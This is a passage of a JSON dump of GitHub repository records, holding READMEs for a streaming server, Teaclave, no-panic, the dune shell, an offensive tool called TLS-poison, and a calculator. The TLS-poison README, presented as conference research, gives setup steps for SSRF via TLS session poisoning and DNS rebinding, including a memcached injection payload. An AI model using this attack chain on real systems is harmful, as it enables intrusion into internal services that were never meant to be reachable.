or false to enable or disable the feature\n enabled = true\n # listening port\n port = 8081\n\n##### HLS\n [hls]\n # true or false to enable or disable the feature\n enabled = true\n # listening port\n port = 8080\n\n##### Log\n\n [log]\n level = \"info\"\n [log.file]\n # \u6253\u5f00\u6216\u8005\u5173\u95ed\u8f93\u51fa\u65e5\u5fd7\u5230\u6587\u4ef6\uff08\u6ce8\u610f\uff1a\u8f93\u51fa\u65e5\u5fd7\u5230\u63a7\u5236\u53f0\u548c\u6587\u4ef6\u53ea\u80fd2\u90091\uff09.\n enabled = true\n # set the rotate\n rotate = \"hour\" #[day,hour,minute]\n # set the path where the logs are saved\n path = \"./logs\"\n\n### \u4e00\u4e9b\u914d\u7f6e\u7684\u4f8b\u5b50\n\n\u6709\u4e00\u4e9b\u73b0\u6210\u7684\u914d\u7f6e\u6587\u4ef6\u653e\u5728\u4e0b\u9762\u7684\u76ee\u5f55\uff1a\n\n xiu/application/xiu/src/config\n\n\u5305\u62ec4\u4e2a\u914d\u7f6e\u6587\u4ef6\uff1a\n\n config_rtmp.toml //\u53ea\u6253\u5f00rtmp\n config_rtmp_hls.toml //\u6253\u5f00 rtmp \u548c hls\n config_rtmp_httpflv.toml //\u6253\u5f00 rtmp \u548c httpflv\n config_rtmp_httpflv_hls.toml //\u6253\u5f00\u6240\u6709\u7684 3 \u4e2a\u534f\u8bae\n \n\n \n## \u5e94\u7528\u573a\u666f\n\n##### \u63a8\u6d41\n\n\u53ef\u4ee5\u7528\u4efb\u4f55\u63a8\u6d41\u8f6f\u4ef6\u6216\u8005\u547d\u4ee4\u5de5\u5177\u6765\u63a8RTMP\u6d41\uff0c\u6bd4\u5982\u4f7f\u7528OBS\u6216\u8005\u7528ffmpeg\u547d\u4ee4\u884c\uff1a\n\n ffmpeg -re -stream_loop -1 -i test.mp4 -c:a copy -c:v copy -f flv -flvflags no_duration_filesize rtmp://127.0.0.1:1935/live/test\n\n\n##### \u64ad\u653e\n\n\u4f7f\u7528ffplay\u6765\u64ad\u653e rtmp/httpflv/hls\u534f\u8bae\u7684\u76f4\u64ad\u6d41:\n\n ffplay -i rtmp://localhost:1935/live/test\n ffplay -i http://localhost:8081/live/test.flv\n ffplay -i http://localhost:8080/live/test/test.m3u8\n \n##### \u8f6c\u53d1 - \u9759\u6001\u8f6c\u63a8\n\n\u5e94\u7528\u573a\u666f\u4e3a\u8fb9\u7f18\u8282\u70b9\u7684\u76f4\u64ad\u6d41\u88ab\u8f6c\u63a8\u5230\u6e90\u7ad9\uff0c\u914d\u7f6e\u5982\u4e0b\uff1a\n\n\u8fb9\u7f18\u8282\u70b9\u7684\u914d\u7f6e\u6587\u4ef6config_push.toml:\n\n [rtmp]\n enabled = true\n port = 1935\n [[rtmp.push]]\n enabled = true\n address = \"localhost\"\n port = 1936\n \n\u6e90\u7ad9\u8282\u70b9\u7684\u914d\u7f6e\u6587\u4ef6config.toml:\n\n [rtmp]\n enabled = true\n port = 1936\n\n\u542f\u52a8\u4e24\u4e2a\u670d\u52a1:\n\n ./xiu config.toml\n ./xiu config_push.toml\n\n\u5c06\u4e00\u8defRTMP\u76f4\u64ad\u6d41\u63a8\u9001\u5230\u8fb9\u7f18\u8282\u70b9\uff0c\u6b64\u76f4\u64ad\u6d41\u4f1a\u88ab\u81ea\u52a8\u8f6c\u63a8\u5230\u6e90\u7ad9\uff0c\u53ef\u4ee5\u540c\u65f6\u64ad\u653e\u6e90\u7ad9\u6216\u8005\u8fb9\u7f18\u8282\u70b9\u7684\u76f4\u64ad\u6d41\uff1a\n\n ffplay -i rtmp://localhost:1935/live/test\n ffplay -i rtmp://localhost:1936/live/test\n\n\n \n##### \u8f6c\u53d1 - \u9759\u6001\u56de\u6e90\n\n\u5e94\u7528\u573a\u666f\u4e3a\u64ad\u653e\u8fc7\u7a0b\u4e2d\u7528\u6237\u4ece\u8fb9\u7f18\u8282\u70b9\u62c9\u6d41\uff0c\u8fb9\u7f18\u8282\u70b9\u65e0\u6b64\u6d41\uff0c\u5219\u56de\u6e90\u62c9\u6d41\uff0c\u914d\u7f6e\u6587\u4ef6\u5982\u4e0b\uff1a\n\n\u6e90\u7ad9\u8282\u70b9\u7684\u914d\u7f6e\u6587\u4ef6\u4e3a config.toml:\n\n [rtmp]\n enabled = true\n port = 1935\n\n \n\u8fb9\u7f18\u8282\u70b9\u7684\u914d\u7f6e\u6587\u4ef6\u4e3a config_pull.toml:\n\n [rtmp]\n enabled = true\n port = 1936\n [rtmp.pull]\n enabled = false\n address = \"localhost\"\n port = 1935\n\n\u8fd0\u884c\u4e24\u4e2a\u670d\u52a1:\n\n ./xiu config.toml\n ./xiu config_pull.toml\n \n\u76f4\u63a5\u5c06\u76f4\u64ad\u6d41\u63a8\u9001\u5230\u6e90\u7ad9\uff0c\u5230\u8fb9\u7f18\u8282\u70b9\u8bf7\u6c42\u6b64\u8def\u76f4\u64ad\u6d41\uff0c\u8fb9\u7f18\u8282\u70b9\u4f1a\u56de\u6e90\u62c9\u6d41\uff0c\u53ef\u4ee5\u540c\u65f6\u64ad\u653e\u8fb9\u7f18\u548c\u6e90\u7ad9\u8282\u70b9\u4e0a\u7684\u76f4\u64ad\u6d41\uff1a\n\n ffplay -i rtmp://localhost:1935/live/test\n ffplay -i rtmp://localhost:1936/live/test\n \n## Star History\n\n[link](https://star-history.t9t.io/#harlanc/xiu)\n\n## \u9e23\u8c22\n\n - [media_server](https://github.com/ireader/media-server.git)\n\n## \u5176\u5b83\n\n\u6709\u4efb\u4f55\u95ee\u9898\u8bf7\u5728issues\u63d0\u95ee\uff0c\u6b22\u8fcestar\u548c\u63d0pull request\u3002\u4f60\u7684\u5173\u6ce8\u53ef\u4ee5\u8ba9\u6b64\u9879\u76ee\u8d70\u7684\u66f4\u5feb\u66f4\u8fdc\u3002\n \n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "apache/incubator-teaclave", "link": "https://github.com/apache/incubator-teaclave", "tags": ["rust", "sgx", "faas", "universal-secure-computing", "trusted-execution-environment", "function-as-a-service", "secure-multiparty-computation", "tee", "confidential-computing", "trustzone"], "stars": 662, "description": "Apache Teaclave (incubating) is an open source universal secure computing platform, making computation on privacy-sensitive data safe and simple.", "lang": "Rust", "repo_lang": "", "readme": "# Teaclave: A Universal Secure Computing Platform\n\n[![License](https://img.shields.io/badge/license-Apache-green.svg)](LICENSE)\n[![Release](https://img.shields.io/github/v/tag/apache/incubator-teaclave?label=release&sort=semver)](https://github.com/apache/incubator-teaclave/releases)\n[![Coverage Status](https://coveralls.io/repos/github/apache/incubator-teaclave/badge.svg?branch=master)](https://coveralls.io/github/apache/incubator-teaclave?branch=master)\n[![Homepage](https://img.shields.io/badge/site-homepage-blue)](https://teaclave.apache.org/)\n\nApache Teaclave (incubating) is an open source ***universal secure computing***\nplatform, making computation on privacy-sensitive data safe and simple.\n\n## Highlights\n\n- **Secure and Attestable**:\n Teaclave adopts multiple security technologies to enable secure computing. In\n particular, Teaclave uses Intel SGX to serve the most security-sensitive tasks\n with *hardware-based isolation*, *memory encryption* and *attestation*.\n Also, Teaclave is written in Rust to prevent *memory-safety* issues.\n- **Function-as-a-Service**:\n Teaclave is provided as a *function-as-a-service platform*. With many built-in\n functions, it supports tasks like machine learning, private set intersection,\n crypto computation, etc. In addition, developers can also deploy and execute\n Python scripts in Teaclave. More importantly, unlike traditional FaaS,\n Teaclave supports both general secure computing tasks and *flexible\n single- and multi-party secure computation*.\n- **Ease of Use**:\n Teaclave builds its components in containers, therefore, it supports\n deployment both locally and within cloud infrastructures. Teaclave also\n provides convenient endpoint APIs, client SDKs and command line tools.\n- **Flexible**:\n Components in Teaclave are designed in a modular manner, and features like remote\n attestation can be easily embedded in other projects. In addition, Teaclave\n SGX SDK and Teaclave TrustZone SDK can also be used separately to write TEE\n apps for other purposes.\n\n## Getting Started\n\n### Try Teaclave\n\n- [My First Function](docs/my-first-function.md)\n- [Write Functions in Python](docs/functions-in-python.md)\n- [How to Add Built-in Functions](docs/builtin-functions.md)\n- [Deploying Teaclave on Azure Confidential Computing VM](docs/azure-confidential-computing.md)\n- [Executing WebAssembly in Teaclave](docs/executing-wasm.md)\n- [Inference Task with TVM in Teaclave](docs/inference-with-tvm.md)\n\n### Design\n\n- [Threat Model](docs/threat-model.md)\n- [Mutual Attestation: Why and How](docs/mutual-attestation.md)\n- [Access Control](docs/access-control.md)\n- [Build System](docs/build-system.md)\n- [Teaclave Service Internals](docs/service-internals.md)\n- [Adding Executors](docs/adding-executors.md)\n- [Papers, Talks, and Related Articles](docs/papers-talks.md)\n\n### Contribute to Teaclave\n\n- [Release Guide](docs/release-guide.md)\n- [Rust Development Guideline](docs/rust-guideline.md)\n- [Development Tips](docs/development-tips.md)\n\n### Codebase\n\n- [Attestation](attestation)\n- [Binder](binder)\n- [Built-in Functions](function)\n- [Client SDK](sdk)\n- [Command Line Tool](cli)\n- [Common Libraries](common)\n- [Configurations in Teaclave](config)\n- [Crypto Primitives](crypto)\n- [Data Center Attestation Service](dcap)\n- [Dockerfile and Compose File](docker)\n- [Examples](examples)\n- [Executor Runtime](runtime)\n- [File Agent](file_agent)\n- [Function Executors](executor)\n- [Keys and Certificates](keys)\n- [RPC](rpc)\n- [Teaclave Services](services)\n- [Teaclave Worker](worker)\n- [Test Harness and Test Cases](tests)\n- [Third-Party Dependency Vendoring](third_party)\n- [Tool](tool)\n- [Types](types)\n\n### API References\n\n- [Teaclave SGX SDK](https://teaclave.apache.org/api-docs/sgx-sdk/)\n- [Teaclave Client SDK (Python)](https://teaclave.apache.org/api-docs/client-sdk-python/)\n- [Teaclave Client SDK (Rust)](https://teaclave.apache.org/api-docs/client-sdk-rust/)\n- [Crates in Teaclave (Enclave)](https://teaclave.apache.org/api-docs/crates-enclave/)\n- [Crates in Teaclave (App)](https://teaclave.apache.org/api-docs/crates-app/)\n\n## Teaclave Projects\n\nThis is the main repository for the Teaclave FaaS platform. There are several\nsub-projects under Teaclave:\n\n- [Teaclave SGX SDK](https://github.com/apache/incubator-teaclave-sgx-sdk)\n- [Teaclave TrustZone SDK](https://github.com/apache/incubator-teaclave-trustzone-sdk)\n\n## Contributing\n\nTeaclave is open source in [The Apache Way](https://www.apache.org/theapacheway/),\nwe aim to create a project that is maintained and owned by the community. All\nkinds of contributions are welcome. Read this [document](CONTRIBUTING.md) to\nlearn more about how to contribute. Thanks to our\n[contributors](https://teaclave.apache.org/contributors/).\n\n## Community\n\n- Join us on our [mailing list](https://lists.apache.org/list.html?dev@teaclave.apache.org).\n- Follow us at [@ApacheTeaclave](https://twitter.com/ApacheTeaclave).\n- See [more](https://teaclave.apache.org/community/).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dtolnay/no-panic", "link": "https://github.com/dtolnay/no-panic", "tags": [], "stars": 660, "description": "Attribute macro to require that the compiler prove a function can't ever panic", "lang": "Rust", "repo_lang": "", "readme": "\\#\\[no\\_panic\\]\n===============\n\n[\"github\"](https://github.com/dtolnay/no-panic)\n[\"crates.io\"](https://crates.io/crates/no-panic)\n[\"docs.rs\"](https://docs.rs/no-panic)\n[\"build](https://github.com/dtolnay/no-panic/actions?query=branch%3Amaster)\n\nA Rust attribute macro to require that the compiler prove a function can't ever\npanic.\n\n```toml\n[dependencies]\nno-panic = \"0.1\"\n```\n\n```rust\nuse no_panic::no_panic;\n\n#[no_panic]\nfn demo(s: &str) -> &str {\n &s[1..]\n}\n\nfn main() {\n println!(\"{}\", demo(\"input string\"));\n}\n```\n\nIf the function does panic (or the compiler fails to prove that the function\ncannot panic), the program fails to compile with a linker error that identifies\nthe function name. Let's trigger that by passing a string that cannot be sliced\nat the first byte:\n\n```rust\nfn main() {\n println!(\"{}\", demo(\"\\u{1f980}input string\"));\n}\n```\n\n```console\n Compiling no-panic-demo v0.0.1\nerror: linking with `cc` failed: exit code: 1\n |\n = note: /no-panic-demo/target/release/deps/no_panic_demo-7170785b672ae322.no_p\nanic_demo1-cba7f4b666ccdbcbbf02b7348e5df1b2.rs.rcgu.o: In function `_$LT$no_pani\nc_demo..demo..__NoPanic$u20$as$u20$core..ops..drop..Drop$GT$::drop::h72f8f423002\nb8d9f':\n no_panic_demo1-cba7f4b666ccdbcbbf02b7348e5df1b2.rs:(.text._ZN72_$LT$no\n_panic_demo..demo..__NoPanic$u20$as$u20$core..ops..drop..Drop$GT$4drop17h72f8f42\n3002b8d9fE+0x2): undefined reference to `\n\n ERROR[no-panic]: detected panic in function `demo`\n '\n collect2: error: ld returned 1 exit status\n```\n\nThe error is not stellar but notice the ERROR\\[no-panic\\] part at the end that\nprovides the name of the offending function.\n\n*Compiler support: requires rustc 1.31+*\n\n
\n\n### Caveats\n\n- Functions that require some amount of optimization to prove that they do not\n panic may no longer compile in debug mode after being marked `#[no_panic]`.\n\n- Panic detection happens at link time across the entire dependency graph, so\n any Cargo commands that do not invoke a linker will not trigger panic\n detection. This includes `cargo build` of library crates and `cargo check` of\n binary and library crates.\n\n- The attribute is useless in code built with `panic = \"abort\"`.\n\nIf you find that code requires optimization to pass `#[no_panic]`, either make\nno-panic an optional dependency that you only enable in release builds, or add a\nsection like the following to Cargo.toml to enable very basic optimization in\ndebug builds.\n\n```toml\n[profile.dev]\nopt-level = 1\n```\n\nIf the code that you need to prove isn't panicking makes function calls to\nnon-generic non-inline functions from a different crate, you may need thin LTO\nenabled for the linker to deduce those do not panic.\n\n```toml\n[profile.release]\nlto = \"thin\"\n```\n\nIf you want no\\_panic to just assume that some function you call doesn't panic,\nand get Undefined Behavior if it does at runtime, see [dtolnay/no-panic#16]; try\nwrapping that call in an `unsafe extern \"C\"` wrapper.\n\n[dtolnay/no-panic#16]: https://github.com/dtolnay/no-panic/issues/16\n\n
\n\n### Acknowledgments\n\nThe linker error technique is based on [Kixunil]'s crate [`dont_panic`]. Check\nout that crate for other convenient ways to require absence of panics.\n\n[Kixunil]: https://github.com/Kixunil\n[`dont_panic`]: https://github.com/Kixunil/dont_panic\n\n
\n\n#### License\n\n\nLicensed under either of Apache License, Version\n2.0 or MIT license at your option.\n\n\n
\n\n\nUnless you explicitly state otherwise, any contribution intentionally submitted\nfor inclusion in this crate by you, as defined in the Apache-2.0 license, shall\nbe dual licensed as above, without any additional terms or conditions.\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "adam-mcdaniel/dune", "link": "https://github.com/adam-mcdaniel/dune", "tags": ["shell", "console", "terminal", "command-line", "scripting-language"], "stars": 659, "description": "A shell\ud83d\udc1a by the beach\ud83c\udfd6\ufe0f!", "lang": "Rust", "repo_lang": "", "readme": "# dune\n\nA shell by the beach!\n\n

\n \n \n

\n\n##### _NOTE: Click the image above for a video demonstration._\n\n## About the Author\n\nI'm a *bored* sophomore in college working on projects to fill the time. If you enjoy my work, consider supporting me by buying me a coffee! \n\n\n \"Buy\n\n\n## Why write another shell?\n\nI feel that bash is great in a lot of ways, but it doesn't exactly feel *cozy*: it's lacking a sort of personal touch, and it's also missing quick and easy customizability. With my last shell, [Atom](https://github.com/adam-mcdaniel/atom), I had accomplished some of the coziness that bash was missing, but I also introduced a lot of *really* fatal flaws in the syntax and the type system.\n\nDune, however, is designed ***completely*** differently from Atom (although you might notice the similarities in their widget systems). The interpreter itself is standalone, and it holds almost none of the functionality you see in the default distribution of Dune. If you wanted to, you could write a custom frontend and make a unique Dune based shell of your own!\n\nThis frontend implementation turns the coziness dial to 11. Just check out the shell's default startup script!\n\n

\n \n \n \n

\n\nI put a *lot* of work into making Dune just fun to use. It's like a neat little operating system itself!\n\nDune also attempts to be a usable scripting language, and even offers a few niche metaprogramming features such as quoting *(borrowed from [Lisp](https://github.com/adam-mcdaniel/wisp))*, operator overloading, and macros!\n\n

\n \n \n

\n\nOverall, I wrote Dune to have a *complete* shell of my own: one that's fast, useful, and pretty.\n\n*(Also, writing a shell is just kinda really fun)*\n\n## Usage\n\nDune has a bunch of customizable components. Here's how you can change them and make your shell your own!\n\n### The Prelude\n\nBefore entering interactive mode, Dune executes *the prelude*. The prelude is just the startup file `.dune-prelude` stored in the home directory for your user. If you don't provide your own prelude file, Dune will execute its own default prelude with an introduction to the shell.\n\nYou can see my example personal prelude [here](./.dune-prelude).\n\n### The REPL\n\nDune's REPL is entirely customizable by overloading the following functions:\n\n|Name|Purpose|Default Implementation|\n|-|-|-|\n|`prompt`|This function is called to generate the text which prompts the user for input. It takes the current working directory, and returns a string.|
let prompt = cwd -> fmt@bold ((fmt@dark@blue \"(dune) \") +
(fmt@bold (fmt@dark@green cwd)) +
(fmt@bold (fmt@dark@blue \"$ \")))
|\n|`incomplete_prompt`|This function is called to generate the text which prompts the user for input when they have entered an incomplete expression. It takes the current working directory, and returns a string.|
let incomplete_prompt = cwd -> ((len cwd) +
(len \"(dune) \")) * \" \" +
(fmt@bold (fmt@dark@yellow \"> \"));
|\n|`report`|This function is called to print a value to the console after evaluation.|*The default implementation is a builtin function (implemented in Rust), but you can overload it with any callable value nonetheless.*|\n\nI highly recommend using the `fmt` module when implementing your own customizations for your prompt!\n\n### Aliases\n\nThis distribution of Dune uses the *`Symbol`* type (the type of variable names and paths) to implement calling programs. Whenever an expression of type *`Symbol`* is evaluated as a command in interactive mode, it is invoked as a program.\n\nBecause of this, you can define aliases by assigning a variable to a program's name like so!\n\n\n\nIf you have defined a variable that overshadows your program's name (such as an alias), you can *quote* the program name to run it.\n\n![Overshadowed](./assets/overshadowed.png)\n\n### Macros\n\nTo write functions that modify your shell's environment and act like commands or programs themselves, use a macro!\n\n![Macros](./assets/macros.png)\n\nMacros, when called with zero arguments, are passed the current working directory. When invoked, they assume the environment of the callee: if you execute a macro, it will execute as if you executed the contents of the macro itself with the parameter defined as the argument passed.\n\n### Piping and Redirection\n\nPiping and redirection are done with the `|` and `>>` operators. Here's some example uses!\n\n![Piping and Redirection](./assets/piping.png)\n\nIf a value is piped into a callable object, like a function or macro, it is performed as an application; otherwise, the expression is treated like a regular call to a program.\n\n## Standard Library\n\nDune offers an extensive standard library, and also provides a pretty interface to see all the functions available in each module!\n\n\n\nDune offers the following builtin libraries:\n\n|Name|Description|\n|-|-|\n|`rand`|A library for randomness|\n|`time`|A library with date and time functions|\n|`math`|A module for math and trig functionality|\n|`fs`|A module for interacting with the file system|\n|`fn`|A functional programming library|\n|`fmt`|A library for text formatting on the console (color, styling, hyperlinks, text wrapping, etc.)|\n|`os`|A small module with the host's OS info|\n|`widget`|A module for creating text widgets|\n|`shell`|A small module for information about the Dune shell|\n|`console`|A library for manipulating the console|\n\nFor more information about each, just run `echo library-name`.\n\n## Installation\n\nTo install, you must download Rust from [here](https://www.rust-lang.org/).\n_If you already have Rust installed **you will probably need to update**. Dune uses a lot of recently stabilized features._\n\n#### Development Build\n\n```bash\n# Install directly from git with cargo\ncargo install --git https://github.com/adam-mcdaniel/dune\n\n# Or, alternatively, the repo and install from source\ngit clone https://github.com/adam-mcdaniel/dune\ncd dune\ncargo install -f --path .\n```\n\n#### Releases\nTo get the current release build, install from [crates.io](https://crates.io/crates/dune).\n\n```bash\n# Also works for updating dune\ncargo install -f dune\n```\n_Currently, since Dune is in its early stages of development, I would recommend against using releases at the moment. There are a lot of bug fixes and new features added inbetween releases._\n\n#### After Install\n\n```bash\n# Just run the dune executable!\ndunesh\n```\n", "readme_type": "markdown", "hn_comments": "It is lovely to see someone sharing software work they did just because they find it subject interesting and fun, not to make a buck or pad a portfolio. This has some good hacker vibes, harder and harder to find these days. Bravo.Try it online: https://nextrepl.leaningtech.com/dune.htmlPowered by CheerpX: A WebAssembly virtual machine for X86 executables.Please note that is a sneak preview of our tech, we plan to release it soon to the public. Stay tuned.https://twitter.com/leaningtechhttps://twitter.com/alexpignottiReminds me of abduco + dvtm, which was pretty bananas to use, but felt _right_ and very unixy.Though, I just use screen now.Impressive indeed. But not sure whether I'd want a widget system built into my shell. Sort of breaks the UNIX philosophy, doesn't it?edit: fixed typoIt's probably worth noting that Dune is already the name of the OCaml build system.Other than that, this is a really interesting and creative project. I'm curious what it will be like to use it in a \"real\" session, I might have to download it and try it.Well this guy is a genious. Congrats on the release.Does this support pipes? It's not clear to me what runs in the same process and what forks a new one. Is there a way to run some shell code in a sub-process (parentheses in conventional shell)? Asynchronously (& in conventional shell)?It's called \"Dune\" and yet I can't find a single Arrakis reference in the repo?!All the best to this project but since new cool shells keep coming up in the frontpage here, I am wondering if anybody is using an alternative shell as a daily driver and getting considerably more out of it?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jmdx/TLS-poison", "link": "https://github.com/jmdx/TLS-poison", "tags": [], "stars": 659, "description": null, "lang": "Rust", "repo_lang": "", "readme": "# TLS Poison\n[YouTube link to presentation](https://youtube.com/watch?v=qGpAJxfADjo)\n\nA tool that allows for generic SSRF via TLS, as well as CSRF via image tags\nin most browsers. The goals are similar to\n[SNI injection](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf),\nbut this new method uses inherent behaviors of TLS,\ninstead of depending upon bugs in a particular implementation.\n\nThis was originally presented at [Blackhat USA 2020](https://www.blackhat.com/us-20/briefings/schedule/#when-tls-hacks-you-19446)\nas well as [DEF CON Safemode](https://www.defcon.org/html/defcon-safemode/dc-safemode-speakers.html#Maddux).\n\nA big thanks goes out to [rustls](https://github.com/ctz/rustls) and \n[dns-mitm](https://github.com/SySS-Research/dns-mitm), each of which this\nis mostly just a strange patched fork.\n\n## Motivation\nBack when gopher support was common, people got a lot of mileage out of\nusing it for SSRF. So much so that there's pretty good tooling like\n[Gopherus](https://github.com/tarunkant/Gopherus) for doing so. This \nis because there are some software packages that often sit unauthenticated\non localhost or on an internal network. A common one is memcached,\nbecause writing to memcached can often become RCE. \n\nWhat if we could replicate this behavior, but instead of giving\nthe attack target a `gopher://` URL which isn't often supported, we\ngive it an `https://` URL? This has been done before with SNI injection,\nbut what if we did it in a more universal way?\n\nIt turns out TLS provides us with the perfect thing - session persistence!\nI plan on eventually writing up how this works, as well as more detail on\nwhat attacks can be done with it. For now you can either watch the Blackhat\nor DEF CON talk, or attempt to decipher the following diagram I came up\nwith a while back:\n![tes](diagram.svg)\n\n## Instructions\nAs a heads up, you will need a domain where you can set NS records.\nIf needed can find a few free subdomain providers which may work by\n[searching around](https://www.google.com/search?q=free+subdomain+hosting+with+ns+record),\nbut I have only tried with a dedicated top-level domain. In any case\nI'd recommend holding off on registering anything until you complete the\nfirst few steps to make sure everything's working properly.\n### TLS server\nThis should be on something public, where the DNS rebinding server will\neventually resolve to. You should probably use a dedicated box/VM for\nthis, since you'll end up exposing whatever port you want to target, e.g.\n11211 for memcached or 25 for SMTP.\n```bash\n# Install dependencies\nsudo apt install git redis\ngit clone https://github.com/jmdx/TLS-poison.git\n# Install rust:\ncurl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh\ncd TLS-poison/client-hello-poisoning/custom-tls\n# There will definitely be warnings I didn't clean up :)\ncargo build\n# Test out the server:\ntarget/debug/custom-tls -p 8443 --verbose --certs ../../rustls/test-ca/rsa/end.fullchain --key ../../rustls/test-ca/rsa/end.rsa http\n# (In another terminal to verify setup)\ncurl -kv https://localhost:8443\n```\n \n ### DNS rebinding server\n You'll need this on a public box as well. If you know for sure your\n box doesn't have a `systemd-resolved` stub resolver, it can be on the\n same box as `custom-tls`, but I'd recommend putting this on its own.\n ```bash\nsudo apt install python3 python3-pip\ngit clone https://github.com/jmdx/TLS-poison.git\ncd TLS-poison/client-hello-poisoning/custom-dns\npip3 install -r requirements.txt\n# $DOMAIN: The domain you own where you will set up NS records\n# $TARGET_IP: Likely 127.0.0.1, though you can set this to be some box \n# netcat listening, for early phases of testing.\n# $INITIAL_IP: The IP of the box with custom-tls\nsudo python3 alternate-dns.py $DOMAIN,$TARGET_IP -b 0.0.0.0 -t $INITIAL_IP -d 8.8.8.8\n# If you get \"OSError: address already in use\", you can do the following\n# to stop systemd-resolved. This might mess up lots of things outside of\n# custom-dns, but if it's on a dedicated VM, you're probably okay.\n# A better way is to add DNSStubListener=no to /etc/systemd/resolved.conf\nsudo systemctl stop systemd-resolved\n# Finally, to verify, run the following a few times to see it alternating:\ndig @localhost $DOMAIN\n```\n\n### Setting up the NS record and certificates\nYou'll need to set up an NS record and a glue record so that DNS requests \ngo to your rebinding server. For example, if your domain is example.com,\nyou should add:\n```\ndns.example.com A 300 \ntlstest.example.com NS 300 dns.example.com\n```\nThen to get a TLS certificate for `tlstest.example.com`, go to the\n[certbot DNS instructions](https://certbot.eff.org/docs/using.html#dns-plugins) and complete a DNS challenge for it. Then, go back to\n`custom-tls` and rerun it:\n```bash\ntarget/debug/custom-tls -p 8443--verbose --certs letsencrypt-cert.fullchain --key letsencrypt-key.rsa http\n```\nNow you're set up to attack real stuff! When something makes a request to\n`https://tlstest.jmaddux.com:8443`, both the TLS session poisoning and DNS\nrebinding steps should be fully functional.\n\n### Putting it all together\nTo use this in different situations, you'll need to vary a few things:\n- port: Your TLS server will need to run on this port, since rebinding only\nswitches up the domain (e.g. tlstest.example.com:11211 can be either 35.x.x.x:11211,\nor 127.0.0.1:11211)\n- sleep: The duration the TLS server sleeps between redirects. This varies\nbased upon what software you are sending custom-tls server, instead of what\ninternal service you're attacking. For example, testing curl-initited SSRF this\ncan be 10000ms, but for chrome-based stuff it can be quite short. On the other\nhand, if you see the attacks failing because you hit a maximum number of redirects,\nconsider increasing this to 59000ms or beyond. If you don't see TLS sessions being\npersisted and re-delivered to the internal service, it can often be fixed by\nvarying the sleep time.\n- payload: Typically will start with a newline, and then have whatever commands\nyou want to inject into the protocol you're targeting.\n\nFor example, for memcached:\n```bash\nredis-cli\n127.0.0.1:6379> set payload \"\\r\\nset foo 0 0 14\\r\\nim in ur cache \\r\"\nCtrl+c\n# Note the following is port 11211 now.\ntarget/debug/custom-tls -p 11211 --verbose --certs ../../rustls/test-ca/rsa/end.fullchain --key ../../rustls/test-ca/rsa/end.rsa -p 11211 http\n```\nThen run you can supply https://tlstest.example.com:11211 as your SSRF payload.\nIf you want to reproduce my curl/memcached demo from the talk, you'll want to pass `-L` to curl to enable redirects, since command-line curl will use a fresh cache each time it's run.\nGood luck, and make sure not to attack anything you don't have permission!\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nerdypepper/eva", "link": "https://github.com/nerdypepper/eva", "tags": ["cli", "calculator", "rust", "hacktoberfest"], "stars": 659, "description": "a calculator REPL, similar to bc(1)", "lang": "Rust", "repo_lang": "", "readme": "\n![heroimg.png](https://u.peppe.rs/6G.png)\n\n# eva\n\nsimple calculator REPL, similar to `bc(1)`, with syntax highlighting and persistent history\n\n![eva.png](https://u.peppe.rs/kP.png)\n\n### installation\n\n- Homebrew\n```shell\n$ brew install eva\n```\n\n- crates.io\n```shell\n$ cargo install eva\n```\n\n- manual\n```shell\n$ git clone https://github.com/nerdypepper/eva\n$ cd eva\n$ cargo run\n```\n\n### usage\n\n```shell\neva 0.3.1\nNerdyPepper \nCalculator REPL similar to bc(1)\n\nUSAGE:\n eva [OPTIONS] [INPUT]\n\nARGS:\n Optional expression string to run eva in command mode\n\nOPTIONS:\n -b, --base Radix of calculation output (1 - 36) [default: 10]\n -f, --fix Number of decimal places in output (1 - 64) [default: 10]\n -h, --help Print help information\n -r, --radian Use radian mode\n -V, --version Print version information\n\n```\n\ntype out an expression and hit enter, repeat.\n\n```shell\n> 1 + sin(30)\n1.5\n> floor(sqrt(3^2 + 5^2))\n5\n> 5sin(45) + cos(0)\n4.53553\n```\n\n### updating\n\n - crates.io\n ```shell\n$ cargo install eva --force\n ```\n\n - manual\n```shell\n$ cargo install --force --path /path/to/eva\n```\n\n### operators\n\n - binary operators: `+ - * / ^ **`\n - unary operators: `+ -`\n\n### constants\n\nsome constants available in rust standard library.\n\n```\ne pi\n```\n\nexamples:\n```\npi * 5^2 # \u03c0r\u00b2\n```\n\n### functions\n\nall trigonometric functions expect input in degrees.\n\n```\n1 argument:\nsin cos tan csc sec cot sinh cosh tanh\nasin acos atan acsc asec acot ln log10 sqrt\nceil floor abs\n\n2 arguments:\nlog nroot\n\ndeg(x) - convert x to degrees\nrad(x) - convert x to radians\n```\n\nexamples:\n```\nsqrt(sin(30)) # parentheses are mandatory for functions\n\nlog10100 # no\nlog10(100) # yes\n\nlog(1, 10) # function with two arguments\n```\n\n### quality of life features\n\n - auto insertion of `*` operator\n```\n>12sin(45(2)) # 12 * sin(45 * (2))\n12\n```\n\n - auto balancing of parentheses\n```\n>ceil(sqrt(3^2 + 5^2 # ceil(sqrt(3^2 + 5^2))\n6\n```\n\n - use previous answer with `_`\n```\n> sin(pi)\n0.0548036650\n> _^2\n0.0030034417\n>\n```\n\n- super neat error handling\n```\n> 1 + ln(-1)\nDomain Error: Out of bounds!\n```\n\n - syntax highlighting\n\n### todo\n\n - ~~add support for variables (pi, e, _ (previous answer))~~\n - ~~syntax highlighting~~\n - ~~multiple arg functions~~\n - ~~screenshots~~\n - ~~create logo~~\n - ~~unary operators (minus, plus)~~\n - ~~add detailed error handler~~\n - ~~add unit tests~~\n - ~~lineditor~~ with syntax highlighting\n - ~~add more functions~~\n\n### contributors\n\nthe rust community has helped eva come a long way, but these devs deserve a\nspecial mention for their contributions:\n\n[Ivan Tham](https://github.com/pickfire) \n[Milan Markovi\u0107](https://github.com/hepek) \n[asapokl](https://github.com/kzoper) \n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", 